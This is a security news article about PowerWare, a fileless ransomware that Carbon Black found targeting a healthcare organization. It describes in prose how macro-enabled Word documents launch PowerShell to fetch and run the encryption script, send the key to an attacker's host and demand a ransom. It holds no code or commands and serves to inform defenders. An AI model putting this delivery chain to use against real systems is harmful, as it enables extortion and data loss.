PowerWare Ransomware Abuses PowerShell, Office Macros

A new fileless ransomware family has been discovered, which abuses Windows’ PowerShell for nefarious activities, a novel approach to ransomware, Carbon Black researchers warn.

Dubbed PowerWare, this piece of malware is being delivered via a more traditional method, namely macro-enabled Microsoft Word documents, but it no longer writes malicious files to disk, as most ransomware does. Instead, it calls for PowerShell, a core utility of current Windows systems, to perform malicious operations, thus attempting to blend in with more legitimate computer activity.

Ransomware has evolved over the past several months to become one of the biggest threats to both consumers and enterprises, courtesy of families such as CryptoWall, Locky, and Teslacrypt. Ransomware is often delivered via malicious emails and via Exploit Kits, and cybercriminals appear determined to employ new techniques to make their malware more efficient.

Most recently, ransomware started attacking hospitals, and PowerWare first emerged in a campaign targeting a healthcare organization, Carbon Black researchers reveal. The ransomware is delivered via malicious Word documents that use embedded macros to spawn “cmd.exe” on the target computer, which in turn calls PowerShell to download and run the PowerWare code.

Researchers noticed that, as soon as the user enables the macros to run in the malicious document, cmd.exe spawns and launches two instances of PowerShell, one to download the ransomware script, and the second to start with the script as input. The script generates random numbers for the encryption key and for the UUID assigned to the endpoint.

The script also sends the information to the attacker controlled host via HTTP, and does that in plain text, an approach that actually creates an operational weakness. Basically, users who have a full capture packet solution can analyze the traffic to identify the right domain and IP info and retrieve the encryption key.

After communicating with the command and control server, the script encrypts files that have specific extensions (it can encrypt a broad range of file formats, the researchers found out). The ransomware also includes an HTML file in every folder with encrypted files, providing users with information on how they can regain access to their files and demanding a $500 ransom (which doubles after two weeks).

While PowerWare’s behavior is different from that of popular ransomware families out there, the use of PowerShell to perform file encryption on compromised systems is not new, but was observed in 2014 by Sophos researchers analyzing a piece of Russian ransomware. Cybercriminals have been abusing PowerShell in other malware as well, with the most recent example being PowerSniff.